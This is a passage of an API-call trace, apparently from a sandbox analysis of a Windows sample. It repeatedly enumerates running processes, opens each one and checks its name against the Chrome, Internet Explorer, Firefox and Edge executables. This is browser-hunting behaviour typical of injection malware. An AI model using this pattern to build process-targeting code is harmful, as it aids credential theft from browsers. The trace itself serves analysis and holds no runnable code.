	[0253.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.951] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.951] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xaac8
	[0253.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.952] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.952] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.953] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.954] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.954] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0253.955] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xaacc
	[0253.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.955] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0253.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.955] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.956] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0253.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.956] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0253.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xaad0
	[0253.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.957] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.957] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.958] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.958] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.958] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0253.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xaad4
	[0253.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.959] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0253.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.960] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.960] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0253.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.960] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0253.961] CloseHandle (hObject=0x4fd0) returned 1
	[0253.961] Sleep (dwMilliseconds=0x64) 
	[0254.063] GetCurrentProcessId () returned 0x110
	[0254.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0254.070] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0254.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0254.072] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0254.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xaad8
	[0254.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.074] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.075] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.075] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.075] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.076] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xaadc
	[0254.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.077] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.077] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.077] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.078] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0254.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xaae0
	[0254.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.079] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0254.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.080] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.080] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0254.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.081] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.081] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0254.082] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xaae4
	[0254.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.082] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0254.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.082] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.083] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0254.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.083] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.083] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0254.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xaae8
	[0254.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.084] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0254.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.084] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.085] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0254.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.085] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.085] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0254.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xaaec
	[0254.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.086] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0254.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.087] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.087] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0254.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.087] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.088] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0254.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xaaf0
	[0254.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.088] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0254.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.089] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.089] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0254.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.089] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.090] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0254.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xaaf4
	[0254.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.090] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0254.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.091] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.091] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0254.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.091] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.091] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xaaf8
	[0254.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.092] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.093] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.093] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.094] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.094] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.095] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xaafc
	[0254.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.095] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.095] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.095] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.096] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xab00
	[0254.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.097] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.097] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.098] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.098] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.098] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xab04
	[0254.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.099] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.099] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.100] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.100] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.100] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xab08
	[0254.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.101] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.102] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.102] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.102] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.103] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xab0c
	[0254.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.103] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.104] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.104] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.104] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.105] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.105] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xab10
	[0254.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.106] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.106] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.106] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.107] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.107] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0254.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xab14
	[0254.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.108] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0254.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.108] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.108] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0254.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.109] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xab18
	[0254.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.110] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.111] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.111] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.111] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0254.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xab1c
	[0254.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.113] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.113] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.113] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.114] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.114] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xab20
	[0254.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.115] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0254.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.115] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.115] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0254.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.116] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xab24
	[0254.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.117] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.117] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
